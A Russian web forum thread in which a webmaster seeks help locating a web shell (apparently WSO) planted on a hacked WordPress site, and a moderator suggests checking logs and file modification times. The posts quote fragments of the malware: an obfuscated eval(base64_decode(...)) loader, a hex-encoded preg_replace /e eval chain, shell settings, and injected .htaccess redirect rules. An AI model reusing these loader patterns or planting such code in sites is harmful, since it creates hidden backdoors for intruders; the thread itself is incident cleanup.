Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Где же shell все-таки сидит?

Модерирует : Cheery

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

vell



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Дошло до меня, что через дыру в WP, мне залили shell, который меняет .htaccess.
Несколько поздновато, но пока не страшны последствия, к тому же предпринял некоторые меры, но не могу найти саму оболочку.
 
Ищу, как знают все, по совету http://habrahabr.ru/company/sprinthost/blog/125839/
но во-первых, логи мне доступны только те, что высылаются по почте хостером  custom_log.previous и error_log.previous, в них строки например такие (на 31.07):
 
193.0.212.119 - - [31/Jul/2012:03:13:15 +0400] "GET / HTTP/1.0" 200 7455 "http://hdonly.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
 
95.168.172.156 - - [31/Jul/2012:03:36:48 +0400] "GET / HTTP/1.0" 200 7455 "http://newigroteka.rolevaya.info/" "Mozilla/4.0 (MSIE 6.0; Windows NT 5.1; Search)"
 
80.28.254.179 - - [31/Jul/2012:06:41:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3450 "http://МОЙ/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
 
89.111.177.207 - - [31/Jul/2012:08:15:04 +0400] "POST /wp-cron.php?doing_wp_cron=1343708102 HTTP/1.0" 200 0 "-" "WordPress/3.3.1; http://МОЙ"
 
и много еще чего, как видите трафик идет на какие-то левые сайты, свой сайт я обозначил как "МОЙ"
 
Так как сами логи я поставил присылать мне с 24го, а подозрения появились 24го, так что я не могу быть уверенным, когда изменили мне .htaccess. Снова в нормальный вид я его вернул утром 01.08.2012.
 
В ненормалном был  
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
 
 
В base64 я ничего в файлах не нахожу, может по не опытности, может и нету (скачал себе, для прочёски) в логах только 25го засечено так: "39827" [Wed Jul 25 00:14:19 2012] [alert] [client 84.51.100.106] /www/МОЙ/www/htdocs/wp-includes/.htaccess: Missing </Files> directive at end-of-file
 
А вот файл wp-admin\js\edit-commentsn.php которого нет в штатном дистрибутиве меня насторожил, в нем я увидел красоту, eval(base64_decode("Ly84NzNhZj и дальше много много буквоцифр, которые расшифровываются с помощью base64.ru во что-то более читаемое, там после перекодированных букво-цифр идет код
 
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';  
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'
и так далее
 
Попытался я его сохранить а мен авира ругнулась,там вирус PHP/Shell.G.1
 
Но опять же, я не вижу ссылок на этот файл (видимо так же зашифрованы) Аналогичное дело с wp-includes\js\tinymce\plugins\inlinepopups\skins\clearlooks2\img\horizontala.php
 
В самом wp я установил exploit-scanner он примерно то же что и я сделал, выделил и упомянутый файл. Толку от него не много, но подчеркивает мол, обрати внимание.
 
По опыту, может кто подскажет сужение направление поиска? Или, если найдено ЭТО, то как порубить и хвосты?
 

Всего записей: 557 | Зарегистр. 06-10-2004 | Отправлено: 14:15 01-08-2012 | Исправлено: vell, 14:48 01-08-2012
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
как видите трафик идет на какие-то левые сайты

не НА, а С других сайтов. либо боты подставляют левые рефереры - часто так делается если статистика посещений и рефереров лежит в открытом виде и индексируется поисковиками, тогда там появляются ссылки на другие сайты. у меня много подобного в логах, но я точно знаю, что все нормально и ничего не взломано.
 

Цитата:
и так далее  

лучше бы видеть весь код.
 
а как проникли - лучше бы иметь доступ ко всем логам - запросите у поддержки
 
насчет  

Цитата:
"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'

http://stackoverflow.com/questions/3328235/how-does-this-giant-regex-work

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 19:14 01-08-2012
vell



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Логи сейчас уже скорее всего бесполезно спрашивать, дата проникновения наверняка осталась далеко позади(
 
 
 
Содержимое wp-admin\js\edit-commentsn.php в оригинальном виде
 
Код horizontala.php в оригинале

Всего записей: 557 | Зарегистр. 06-10-2004 | Отправлено: 08:44 02-08-2012
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
vell

Цитата:
дата проникновения наверняка осталась далеко позади(  

так посмотрите время изменения/создания левых файлов
 
насчет вашего кода
http://redleg-redleg.blogspot.com/p/example-of-backdoor-script.html
и посмотрите
http://forum.ru-board.com/forum.cgi?action=filter&forum=11&filterby=topictitle&word=%E2%E8%F0%F3
часто уводят ftp пароли

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 09:01 02-08-2012 | Исправлено: Cheery, 09:07 02-08-2012
vell



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Cheery пароль мог быть украден давно,когда хранился в totalcommander'е
дата всех файлов остается без изменений-вычислить по ней нельзя!
 
причем Чызшвуклм через хостинг я проверял, он вообще ничего путного не указал
 
24го я поменял .htaccess на нормальный, сменил пароль фтп, причем не вводил его а копипастил, 26го проверил .htaccess снова сменен-шелл ведь живет. у меня один вируальный хостинг с одним главным доменом и двумя поддоменами,  вот где шелл пока не понял, а сьеды на всех трех. вчера компы проверял с помощью avz все было чисто сейчас trojan remover'ом проверил, но все чисто.
 
ссылки посмотрел. инфа конечно обогащает знаниями но я пока не выяснил как залили шелл и какой. чтобы оттуда выскрести. пока изучаю http://revisium.com/ai/
 
смотрю лог за вчера  
несколько раз логиняться из австралии
125.255.84.98 - - [31/Jul/2012:23:42:50 +0400] "POST /wp-login.php HTTP/1.0" 200 3450 "http://МОЙ.RU/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
испании 79.148.238.85  италии 95.241.106.161 с этим как бороться?
 
расшифровал дальше что там мне написали злоумышленники:
    Содержит сигнатуру PHP-вируса PHP/Shell.G.2

Всего записей: 557 | Зарегистр. 06-10-2004 | Отправлено: 10:33 02-08-2012 | Исправлено: vell, 14:07 02-08-2012
vell



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
но это то зло, которое работает, а я хочу найти то зло которое это запускает или где основа
если взглянуть на array_map('WSOstripslashes', $array) то это даст мысль о шелле WSO, гугление по нему.дает странички о том как залить. но вот как убрать-не видел((

Всего записей: 557 | Зарегистр. 06-10-2004 | Отправлено: 14:09 02-08-2012 | Исправлено: vell, 14:57 02-08-2012
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
vell

Цитата:
а я хочу найти то зло которое это запускает или где основа  

что значит "запускает"? это "запускается" прямым обращением к нему и передается командна на выполнение.

Цитата:
26го проверил .htaccess снова сменен-шелл ведь живе

смотрите время изменения и смотрите логи за это время и измененные файлы за этот же промежуток времени

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 20:24 02-08-2012
vell



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Cheery чтобы к закачанному шелу получить доступ надознать где он лежит или как-то хитрее становится работа с ним?
 
время изменения остается таким же как и оригинал, не меняется ни дата ни время!
 
да и где посмотреть, какие права доступа к файлам\директориям установить? видел массу советов, позакрывать все все, но и WP тогда не будет работать же!

Всего записей: 557 | Зарегистр. 06-10-2004 | Отправлено: 12:46 06-08-2012 | Исправлено: vell, 13:51 06-08-2012
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
vell

Цитата:
где он лежит или как-то хитрее становится работа с ним?

и где лежит и пароль к нему.

Цитата:
не меняется ни дата ни время!  

такого не может быть при изменениях файлов.

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 18:48 06-08-2012
vell



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
такого не может быть при изменениях файлов.  

а если злодей приведет дату измененного файла к той же дате, что была до манипуляции?
 
у меня теперь сомнения про инъекция в бд SQL...

Всего записей: 557 | Зарегистр. 06-10-2004 | Отправлено: 14:13 07-08-2012
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Где же shell все-таки сидит?


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.Board
© Ru.Board 2000-2020

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru